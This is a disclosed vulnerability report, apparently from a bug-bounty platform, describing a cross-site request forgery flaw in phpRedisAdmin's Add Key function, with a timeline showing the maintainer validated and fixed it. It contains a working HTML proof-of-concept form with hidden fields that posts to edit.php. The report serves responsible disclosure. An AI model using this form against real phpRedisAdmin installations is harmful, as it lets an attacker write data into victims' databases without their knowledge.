Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin


Reported on

Aug 23rd 2021

✍️ Description

The Add Key functionality in the Application is vulnerable to CSRF attack.

🕵️‍♂️ Proof of Concept

<script>history.pushState('', '', '/')</script>
<form action="https://domain.tld/phpRedisAdmin/edit.php?view&s=1&d=0&key=testkey1" method="POST">
<input type="hidden" name="type" value="string" />
<input type="hidden" name="key" value="testkey13" />
<input type="hidden" name="hkey" value="" />
<input type="hidden" name="index" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="value" value="testval1" />
<input type="hidden" name="oldvalue" value="" />
<input type="submit" value="Submit request" />

💥 Impact

This vulnerability can let an attacker add data to the database without the knowledge/interaction of the user. 📍 Location index.php#L1 📝 References Cross-site request forgery (CSRF)


Melbin Mathew Antony modified the report
2 years ago
We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
2 years ago

Fixed in

2 years ago


Hi, please mark the vulnerability as validated and fixed. Thanks

Erik Dubbelboer validated this vulnerability 2 years ago
Melbin Mathew Antony has been awarded the disclosure bounty
The fix bounty is now up for grabs
Erik Dubbelboer marked this as fixed with commit b9039a 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation